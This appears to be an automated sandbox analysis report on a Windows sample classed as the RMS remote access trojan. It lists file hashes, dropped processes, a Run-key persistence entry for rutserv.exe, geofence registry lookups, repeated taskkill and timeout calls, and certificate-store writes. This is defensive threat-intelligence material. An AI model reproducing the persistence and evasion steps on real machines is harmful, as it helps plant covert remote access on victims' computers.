rms | 5903ca7c770eb447d3d83e9dbc28469b172d74a4e9fb552db6c41db8e96db330

Analysis

max time kernel
148s
max time network
149s
platform
windows10_x64
resource
win10v20210410
submitted
06-07-2021 21:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5903CA7C770EB447D3D83E9DBC28469B172D74A4E9FB5.exe
Size

6.8MB
MD5

82f18d250b9262253e3f358b26d8888b
SHA1

94412e471583266dd4b89daea0e2ca4238c0ac95
SHA256

5903ca7c770eb447d3d83e9dbc28469b172d74a4e9fb552db6c41db8e96db330
SHA512

c17abb82c904735a845dd50ee5a48b5cbc14526eeedc9de07cef72ac3b78d6fe00abf3f65521ae1048a2d4ffbd64f62e0703ee61ccc08059625bae15d939c4a6

Score

10^/10

rms persistence rat trojan

Malware Config

Signatures

RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

svchost.exe

description pid process target process

PID 3676 created 3772 3676 svchost.exe rutserv.exe
Executes dropped EXE 3 IoCs

Processes:

5903CA7C770EB447D3D83E9DBC28469B172D74A4E9FB5.tmprutserv.exerutserv.exe

pid process

1312 5903CA7C770EB447D3D83E9DBC28469B172D74A4E9FB5.tmp
3772 rutserv.exe
2448 rutserv.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

rutserv.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation rutserv.exe
Loads dropped DLL 4 IoCs

Processes:

rutserv.exerutserv.exe

pid process

3772 rutserv.exe
3772 rutserv.exe
2448 rutserv.exe
2448 rutserv.exe

description	pid	process	target process
PID 3676 created 3772	3676	svchost.exe	rutserv.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation	rutserv.exe

pid	process
3772	rutserv.exe
3772	rutserv.exe
2448	rutserv.exe
2448	rutserv.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\serv = "C:\\ProgramData\\Immunity\\rutserv.exe"	reg.exe

Drops file in System32 directory 14 IoCs

Processes:

rutserv.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	rutserv.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	rutserv.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	rutserv.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C86BD7751D53F10F65AAAD66BBDF33C7	rutserv.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	rutserv.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	rutserv.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EB35376744F392396307460D546222D_EC1C46868A78521D3A7ED5209EF9CB19	rutserv.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\378B079587A9184B2E2AB859CB263F40_524AD1B9B08D3C6450727265AE77B7D2	rutserv.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EB35376744F392396307460D546222D_EC1C46868A78521D3A7ED5209EF9CB19	rutserv.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	rutserv.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	rutserv.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	rutserv.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\378B079587A9184B2E2AB859CB263F40_524AD1B9B08D3C6450727265AE77B7D2	rutserv.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C86BD7751D53F10F65AAAD66BBDF33C7	rutserv.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

2480 timeout.exe

pid	process
2480	timeout.exe

Kills process with taskkill 64 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
1100	taskkill.exe
3896	taskkill.exe
3860	taskkill.exe
3188	taskkill.exe
1704	taskkill.exe
2624	taskkill.exe
3968	taskkill.exe
3240	taskkill.exe
3064	taskkill.exe
2760	taskkill.exe
196	taskkill.exe
1692	taskkill.exe
2760	taskkill.exe
1204	taskkill.exe
3972	taskkill.exe
1904	taskkill.exe
1296	taskkill.exe
2236	taskkill.exe
2780	taskkill.exe
1684	taskkill.exe
3048	taskkill.exe
1692	taskkill.exe
3048	taskkill.exe
2336	taskkill.exe
2180	taskkill.exe
2180	taskkill.exe
3972	taskkill.exe
4080	taskkill.exe
3912	taskkill.exe
2112	taskkill.exe
3904	taskkill.exe
2268	taskkill.exe
2236	taskkill.exe
3700	taskkill.exe
3972	taskkill.exe
2180	taskkill.exe
3972	taskkill.exe
196	taskkill.exe
728	taskkill.exe
3860	taskkill.exe
804	taskkill.exe
3736	taskkill.exe
2112	taskkill.exe
3064	taskkill.exe
2180	taskkill.exe
2112	taskkill.exe
2624	taskkill.exe
3188	taskkill.exe
1692	taskkill.exe
1692	taskkill.exe
3736	taskkill.exe
1624	taskkill.exe
4080	taskkill.exe
1204	taskkill.exe
3064	taskkill.exe
3188	taskkill.exe
1824	taskkill.exe
3848	taskkill.exe
1296	taskkill.exe
2236	taskkill.exe
2236	taskkill.exe
3064	taskkill.exe
1704	taskkill.exe
1692	taskkill.exe

Modifies data under HKEY_USERS 45 IoCs

Processes:

rutserv.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	rutserv.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	rutserv.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@C:\Windows\SysWOW64\FirewallControlPanel.dll,-12122 = "Windows Firewall"	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	rutserv.exe

Modifies system certificate store 2 TTPs 8 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

rutserv.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	rutserv.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	rutserv.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d4304000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	rutserv.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c00000001000000040000000008000004000000010000001000000087ce0b7b2a0e4900e158719b37a893720300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	rutserv.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\91C6D6EE3E8AC86384E548C299295C756C817B81	rutserv.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\91C6D6EE3E8AC86384E548C299295C756C817B81\Blob = 0f000000010000001400000085fef11b4f47fe3952f98301c9f98976fefee0ce7f000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030109000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030153000000010000002500000030233021060b6086480186f8450107300130123010060a2b0601040182373c0101030200c06200000001000000200000008d722f81a9c113c0791df136a2966db26c950a971db46b4199f4ea54b78bfb9f1400000001000000140000007b5b45cfafcecb7afd31921a6ab6f346eb5748501d00000001000000100000005b3b67000eeb80022e42605b6b3b72400b000000010000000e00000074006800610077007400650000007e000000010000000800000000c0032f2df8d60103000000010000001400000091c6d6ee3e8ac86384e548c299295c756c817b812000000001000000240400003082042030820308a0030201020210344ed55720d5edec49f42fce37db2b6d300d06092a864886f70d01010505003081a9310b300906035504061302555331153013060355040a130c7468617774652c20496e632e31283026060355040b131f43657274696669636174696f6e205365727669636573204469766973696f6e31383036060355040b132f2863292032303036207468617774652c20496e632e202d20466f7220617574686f72697a656420757365206f6e6c79311f301d06035504031316746861777465205072696d61727920526f6f74204341301e170d3036313131373030303030305a170d3336303731363233353935395a3081a9310b300906035504061302555331153013060355040a130c7468617774652c20496e632e31283026060355040b131f43657274696669636174696f6e205365727669636573204469766973696f6e31383036060355040b132f2863292032303036207468617774652c20496e632e202d20466f7220617574686f72697a656420757365206f6e6c79311f301d06035504031316746861777465205072696d61727920526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100aca0f0fb8059d49cc7a4cf9da159730910450c0d2c6e68f16c5b4868495937fc0b3319c2777fcc102d95341ce6eb4d09a71cd2b8c9973602b789d4245f06c0cc4494948d02626feb5add118d289a5c8490107a0dbd74662f6a38a0e2d55444eb1d079f07ba6feee9fd4e0b29f53e84a001f19cabf81c7e89a4e8a1d871650da3517beebcd222600db95b9ddfbafc515b0baf98b2e92ee904e86287de2bc8d74ec14c641eddcf8758ba4a4fca68071d1c9d4ac6d52f91cc7c71721cc5c067eb32fdc9925c94da85c09bbf537d2b09f48c9d911f976a52cbde0936a477d87b875044d53e6e2969fb3949261e09a5807b402debe82785c9fe61fd7ee67c971dd59d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e041604147b5b45cfafcecb7afd31921a6ab6f346eb574850300d06092a864886f70d010105050003820101007911c04bb391b6fcf0e967d40d6e45be55e893d2ce033fedda25b01d57cb1e3a76a04cec5076e864720ca4a9f1b88bd6d68784bb32e54111c077d9b3609deb1bd5d16e4444a9a601ec55621d77b85c8e48497c9c3b5711acad73378e2f785c906847d96060e6fc073d222017c4f716e9c4d872f9c8737cdf162f15a93efd6a27b6a1eb5aba981fd5e34d640a9d13c861baf5391c87bab8bd7b227ff6feac4079e5ac106f3d8f1b79768bc437b3211884e53600eb632099b9e9fe3304bb41c8c102f94463209e81ce42d3d63f2c76d3639c59dd8fa6e10ea02e41f72e9547cfbcfd33f3f60b617e7e912b8147c22730eea7105d378f5c392be404f07b8d568c68	rutserv.exe
